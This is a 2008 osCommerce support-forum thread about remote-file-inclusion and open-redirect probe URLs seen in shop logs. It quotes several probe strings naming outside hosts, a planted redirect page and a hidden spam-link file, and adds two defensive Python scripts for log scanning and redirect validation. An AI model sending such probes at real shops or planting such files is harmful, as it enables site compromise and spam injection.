monte22 Posted March 16, 2008

I've noticed in the last week or so, in the who's online page, that I have had some strange links in the "last url" section. Things like:

/index.php?cPath=http://thepotparty.eclub.lv/images?
/index.php?cPath=http://turiusisjsuisnsi.chat.ru/html/body?
/index.php?cPath=http://luckpotparty.eclub.lv/images?
/index.php?cPath=http://turiusisjsuisnsi.chat.ru/html/body?

and a handful of others that are similar. The second half of the link leads to some type of script that I have no idea what it does. My site is set up so that register_globals is turned off, but I'd like to know if there is any other harm that could come. Also, each "visitor" has a different IP address, so I really don't know who is attempting to execute these scripts. Anyone else with a similar experience?
Guest Posted March 17, 2008

[quotes monte22's post of March 16 in full]

Probably probing for weakness.
Softtail3005 Posted March 17, 2008

[quotes monte22's post of March 16 in full]

I just got the same thing that you got, last night and today, while looking at "Who is on line". Last night I checked all the program files and nothing was unusual. If I discover anything I will advise; please do likewise. All the ones I received were ../index.php?cPath=http://thepotparty.eclub.lv/images? but were tied to different IP addresses.
monte22 (Author) Posted March 17, 2008

[quotes Softtail3005's post above in full]

If your site is set up so that register_globals is set to on, you may be in trouble. register_globals allows for the execution of scripts in this manner. I'd install the contrib below if you haven't already. http://addons.oscommerce.com/info/2097

James
Guest Posted March 19, 2008

I too have found very similar stuff on my website through the who's online function. These are the few that I have caught:

/catalog/index.php?body=http://www.rangersales.com/images/can?
/catalog/index.php?goto=http://www.hagenclauss.de//vwar/convert/.r/bush??
/catalog/index.php?go=http://12.30.229.109/images/.../di??

Does anyone know exactly what this is doing? I entered the URLs in and saw my website exactly as it should look, but with the above URL extensions? Does this mean that particular page is being shown from another server or something like that? I checked the IPs and they are from Bulgaria, the US and Italy. Does anyone know where to find the weakness?

I have found a couple of strange files in my root directory. They are:

redir.html (File Type: HTML document text):
<html> <head> <META http-equiv="refresh" content="0;URL=http://sugaronly.com/"> </head> <body> </body> </html>

ftp_info.php, with a huge amount of redirects loaded in it. It went on like this:
<!--uFGe2KWGKi|1198713603--><spam style=display:none><a href='http://exclusive-mp3.com/' title='mp3 download'>mp3 download</a><a href='http://exclusive-mp3.com/genres/' title='mp3 downloads'>mp3 downloads</a><a href='http://exclusive-mp3.com/topcharts/' title='leona lewis'>leona lewis</a><a href='http://www.ncsa.uiuc.edu/~ncsanews/buy/levitra/levitra.html' title='levitra'>levitra</a><a href='http://www.ncsa.uiuc.edu/~ncsanews/buy/levitra/levitra-online.html' title='levitra online'>levitra online</a><a href='http://www.ncsa.uiuc.edu/~ncsanews/buy/levitra/buy-levitra.html' title='buy levitra'>buy levitra</a><a href='http://www.ncsa.uiuc.edu/~ncsanews/buy/levitra/buy-levitra-online.html' title='buy levitra online'>buy levitra online</a><a href='http://www.ncsa.uiuc.edu/~ncsanews/buy/levitra/order-levitra.html' title='order levitra'>order levitra</a><a href='http://www.ncsa.uiuc.edu/~ncsanews/buy/levitra/order-levitra-online.html' title='order levitra online'>order levitra online</a><a href='http://www.ncsa.uiuc.edu/~ncsanews/buy/levitra/discount-levitra.html'

You don't notice how long this file is because all of the information is on one line only, and until you copy and paste it out you don't see the rest. I have deleted this but am not sure if this is the only one? My register_globals was on in my php.ini file. Any solutions out there?
monte22 (Author) Posted March 19, 2008

When a URL such as /catalog/index.php?body=http://www.rangersales.com/images/can? is accessed and you have register_globals ON, the script located at http://www.rangersales.com/images/can? is executed on your site! Usually these scripts are designed to extract data from people who visit the site. Injected code similar to the one above is a way to do that. The simplest solution is to install the register_globals contribution at http://addons.oscommerce.com/info/2097. This will allow you to operate your site with register_globals OFF! We have a highly modified shop, and installing the contribution did not break a single function. Very happy. I think I read that in RC2 or RC2a register_globals can be off as well, but don't quote me on that.

James
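An added example (my own code, not osCommerce's and not written by any poster) of how to spot the probes James describes in ordinary web-server access logs instead of by watching the who's online page: it flags every query parameter whose value is itself a URL, which is what a remote-file-inclusion or open-redirect scanner sends, and tallies the remote hosts named. The log lines are constructed for the example; the hostnames in them are the ones quoted in this thread.

```python
"""Flag query parameters whose value is itself a URL: the signature of the
remote-file-inclusion / open-redirect probes discussed in this thread.

Added example, not osCommerce code and not from any poster. The access-log
lines below are constructed for this example (combined log format); the
hostnames in them are the ones quoted in the thread.
"""
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# One combined-log-format line: ip, ident, user, [timestamp], "METHOD path proto", status, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3})'
)

# Matches absolute (scheme://host) and scheme-relative (//host) URLs.
URL_VALUE_RE = re.compile(r'^(?:[a-z][a-z0-9+.\-]*:)?//', re.I)

# Constructed sample data; hostnames are those quoted in the thread.
SAMPLE_LOG = """\
203.0.113.10 - - [16/Mar/2008:10:01:02 +0000] "GET /index.php?cPath=http://thepotparty.eclub.lv/images? HTTP/1.1" 200 5120
203.0.113.11 - - [16/Mar/2008:10:01:05 +0000] "GET /index.php?cPath=22_31 HTTP/1.1" 200 6100
198.51.100.7 - - [17/Mar/2008:11:20:00 +0000] "GET /catalog/index.php?body=http://www.rangersales.com/images/can? HTTP/1.1" 200 5120
198.51.100.8 - - [17/Mar/2008:11:21:13 +0000] "GET /store/index.php?language=https://myweddingphotos.by.ru/images? HTTP/1.0" 200 5120
192.0.2.5 - - [17/Mar/2008:11:22:00 +0000] "GET /store/index.php?language=//myweddingphotos.by.ru/images? HTTP/1.0" 200 5120
192.0.2.6 - - [17/Mar/2008:11:23:00 +0000] "GET /product_info.php?products_id=31 HTTP/1.1" 200 7000
"""


def remote_url_params(request_path):
    """Return [(param, value)] for every query parameter whose value is a URL."""
    query = urlsplit(request_path).query
    return [(name, value)
            for name, value in parse_qsl(query, keep_blank_values=True)
            if URL_VALUE_RE.match(value)]


def scan(log_text):
    """Parse log lines; return (probe records, Counter of remote hosts named).

    The source IP is kept for the record but, as the thread notes, it varies
    per hit; the stable indicator is the host the parameter points at.
    """
    probes, hosts = [], Counter()
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        for param, url in remote_url_params(m['path']):
            host = urlsplit(url).hostname or ''
            probes.append({'ip': m['ip'], 'path': m['path'],
                           'param': param, 'url': url, 'host': host})
            hosts[host] += 1
    return probes, hosts


if __name__ == '__main__':
    found, by_host = scan(SAMPLE_LOG)
    for p in found:
        print(f"{p['ip']:<14} {p['param']}={p['url']}")
    print('remote hosts:', by_host.most_common())
```

The output is a triage list, not proof of compromise: a parameter that legitimately carries a URL (a referrer field, say) will also be flagged, and a 200 status only shows the shop answered, not that it fetched or executed anything. What the tally of remote hosts gives you is something stable to block or look for in the codebase, which the ever-changing source IPs do not.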
Softtail3005 Posted March 19, 2008

[quotes monte22's post above in full]

Hi James, I noticed in your original post that you said that your register_globals was turned off; were you getting these strange links even with it turned off? My hosting site turns off register_globals and I am getting these weird links. Mine are from Latvia or Russia; the Latvia site is thepotparty.eclub.lv and is a free hosting site in Latvia. I have gone into my site and done a view source and cannot see anything strange in the code even with these links on my sites. I also cannot understand how they get so many unique IP addresses. I still cannot figure out what this code is for; if I log in with the complete path (thepotparty...) and look at the page source that is executing, I cannot see it doing anything harmful. Still do not know the purpose of the link.

Thanks
Jon
monte22 (Author) Posted March 19, 2008

[quotes Softtail3005's post above in full]

I started noticing them last week. I did some digging and found out all the reasons I should have a site that is not dependent on register_globals. Last Saturday I used the contribution above to allow for register_globals to be turned off. Since then I have not seen these links in whos_online. I'm not sure what they are trying to do either, but the only person I want executing scripts on my site is me. :)

A few thoughts on how they get so many unique IP addresses:
1. The link is contained in a spam email, then is clicked by the receiver.
2. The link is submitted to a search engine for submission, then is automatically spidered by the search engine's computer.
3. The link is posted on some forum or anywhere where someone could click it.

It doesn't necessarily have to be the hacker who is executing the script, so blocking these IP addresses won't help. Below is a link to an article that talks about 5 common website vulnerabilities. register_globals is #1: http://www.securityfocus.com/infocus/1864

James
Softtail3005 Posted March 20, 2008

[quotes monte22's post above in full]

Thanks James, I am going to put the patches in today.
Jon
Vger Posted March 20, 2008

This has absolutely nothing whatsoever to do with Register Globals. That's a complete and utter load of nonsense. You can test it for yourself quite simply by copying one of the attempts to redirect and pasting it into your browser. If it works and it takes you somewhere other than your website, then you have a problem with security on your site; if it goes to your site only, perhaps throwing a 404 error or perhaps not, then you don't have a problem.

What the first poster was seeing was an attempt to exploit an open redirect script, to find if it is available. Provided you are using a version of osCommerce from later than 2005, that loophole is plugged.

In Maree's case her whole site has been exploited, and you don't get to be able to upload new files because Register Globals is on in php.ini. Either someone has her user name and password and misused them, or she left her admin folder open, or the server was exploited and they got in via an insecure root on the server (cPanel is vulnerable to this).

Vger
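An added example (my own code, neither osCommerce's redirect.php nor anything a poster wrote) of the server-side counterpart of Vger's paste-it-into-the-browser test: the check a redirect handler needs so that it only ever forwards to its own host. It goes beyond the single case in the thread by also rejecting the userinfo, scheme-relative and backslash variants that get past a naive "starts with http://myshop/" comparison. The hostname shop.example and the default landing page are assumptions for the example.

```python
"""Server-side version of Vger's test: does a redirect target stay on-site?

Added example, not osCommerce's redirect.php and not from any poster. A redirect
script that forwards to whatever URL it is handed is an open redirect; the check
below accepts only targets that land on the shop's own host, including the cases
that defeat a naive "starts with http://myshop/" comparison. SITE_HOST and
DEFAULT_TARGET are assumed values for this example.
"""
from urllib.parse import urlsplit

SITE_HOST = "shop.example"      # assumption: the shop's own hostname
DEFAULT_TARGET = "/index.php"   # assumption: where to send the visitor instead


def is_safe_redirect(target, site_host=SITE_HOST):
    """True only if `target` is a same-site path or an http(s) URL on site_host."""
    if not target:
        return False
    # CR/LF would let the value inject response headers; backslashes are
    # treated as '/' by some browsers, so '/\evil.example' would become
    # '//evil.example' (scheme-relative, i.e. off-site).
    if any(c in target for c in "\r\n\x00\\"):
        return False
    try:
        parts = urlsplit(target)
    except ValueError:          # e.g. malformed IPv6 literal
        return False
    if parts.scheme and parts.scheme not in ("http", "https"):
        return False            # javascript:, data:, ftp:, ...
    if not parts.netloc:
        # No host part: accept only an absolute path on this site. This also
        # accepts '/index.php?cPath=http://...' (the probe seen in the thread)
        # because the foreign URL is only a parameter value, not the destination.
        return target.startswith("/") and not target.startswith("//")
    # Host part present: compare the parsed hostname, which drops any
    # 'user@' prefix and ':port' suffix that a substring check would trust.
    return (parts.hostname or "") == site_host.lower()


def safe_redirect_target(target, default=DEFAULT_TARGET):
    """Return `target` if it is safe to redirect to, else `default`."""
    return target if is_safe_redirect(target) else default


if __name__ == "__main__":
    for t in ["/checkout.php",
              "http://shop.example/account.php",
              "http://thepotparty.eclub.lv/images?",
              "//thepotparty.eclub.lv/images?",
              "http://shop.example@evil.example/",
              "http://shop.example.evil.example/",
              "javascript:alert(1)"]:
        print(f"{'ALLOW' if is_safe_redirect(t) else 'DENY ':5} {t}")
```

The point of comparing the parsed hostname rather than a string prefix is that http://shop.example@evil.example/ and http://shop.example.evil.example/ both begin with the shop's name yet send the visitor elsewhere; if the browser test in Vger's post lands you off-site, it is usually one of these that the old check let through.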
Softtail3005 Posted March 20, 2008

[quotes Vger's post above in full]

So just what is this? If I do a who's online I get about 20-50 of the following:

/store/index.php?language=http://myweddingphotos.by.ru/images?
/store/index.php?language=http://myweddingphotos.by.ru/images?
/store/index.php?cPath=http://myweddingphotos.by.ru/images?
/store/index.php?language=http://myweddingphotos.by.ru/images?

most with different IP addresses. I have followed the path and it just displays my own web page. Global registered variables are off and I have the Richard Bentley patches installed. I do not notice any real problems on my web site, maybe increased bandwidth but that is all. Has anybody got an idea on what this is trying to accomplish and why?

Thanks
Jon
monte22 (Author) Posted March 20, 2008

[quotes Vger's post above in full]

So are you saying having register_globals enabled poses no security risks? Whatever script these people are trying to execute, redirect or not, having register_globals on opens the door for them. Am I saying that once you install the patch there will automatically be no more attempts? No, but in my experience, since I installed the patch, I have not seen the links the handful of times I have checked. Correlation or causation? Hard to tell. Having a site that isn't reliant on register_globals is MORE secure than a site that is.
Vger Posted March 21, 2008

Register Globals is only one factor in site security, but to listen to some people talk it's the only thing. Every day I see sites hacked on other people's servers with programmes which run with Register Globals off. The two most dangerous things to site security at the moment?
1. cPanel: no jailed root, and it regularly gets exploited.
2. Outdated versions of phpBB. The mass mailer is an all-you-can-eat buffet for spammers. Not limited to phpBB, but it's the target simply because it's the most widely used.

The only time I have seen the exploit posted above being successful on osCommerce (with Register Globals 'on') was with the 2003-2005 version, where the redirect.php file did not check that the added URL was coming from within your site.

Vger
Vger Posted March 21, 2008

[quoting Softtail3005:] I have followed the path and it just displays my own web page.

Then you don't have a problem. These attempts happen on all kinds of websites every single day. It's just hackers looking to exploit vulnerabilities. They're not even targeting you. They use automated programmes.

Vger
monte22 (Author) Posted March 21, 2008

[quotes Vger's first post of March 21 in full]

Yes, there are a million ways to hack a site with register_globals on or off. The point of this post was not to solve every single problem, but to share my experience. One day I noticed strange links on the who's online page. I didn't know what they were. I did some digging and found that having register_globals enabled allows for the execution of some scripts in the same manner as I saw in the links on the who's online page. I found and installed a register_globals patch. In MY case, the strange links disappeared from the who's online page. These links may or may not be causing any harm to the site or its visitors. My point is that closing one large door on outside sources' ability to execute scripts is an improvement. Not 100% hacker proof, but better.

James
GemRock Posted March 21, 2008

[quoting monte22:] ... Not 100% hacker proof, but better...

Not as far as osc is concerned; it makes little difference on a given server.

Ken
Vger Posted March 21, 2008

Given how widely used it is, osCommerce has been relatively free of hacks when compared to other popular PHP based programmes. The hacks which caused most problems were the Open Redirect (plugged) and the Contact Us form exploit (plugged).

If you have Register Globals 'off' but are unfortunate enough to be using a version of cPanel which is out of date, then the hackers can get directly into the server, or into your site from another site they've hacked on the same server, because cPanel has no jailed root for each website. So if they get into one site they can get into all other sites as well. I mention cPanel specifically because:

1. It is the most widely used and popular control panel and therefore the greatest target for hackers, who do manage to find new exploits between 2 and 4 times a year. If another type of control panel were the most widely used and popular then perhaps they'd have the sort of problems cPanel does. Though I personally doubt this, because I think the major problem with cPanel is structural.
2. There are many small hosts out there who self-manage their servers and use cPanel but, because of their inexperience and cost-cutting, fail to keep it updated with all of the latest security fixes and patches.
3. Although I have come across many exploits of cPanel over the past years, I have yet to come across a major exploit of either Ensim or Plesk control panels.
4. We use Ensim Pro X on our servers, running in High Security mode, with each website having its own jailed root and its own php.ini file, which allows the site owner to run with Register Globals 'on' or 'off'. We've not had an exploit of an osCommerce website running with Register Globals 'on' in 3 years, provided the version of osCommerce they use is from 2005 onwards. And the hackers do try; we see that from the error logs.

What I'm saying is that server security is far more important than whether an osCommerce website runs with Register Globals 'on' or 'off'.

Vger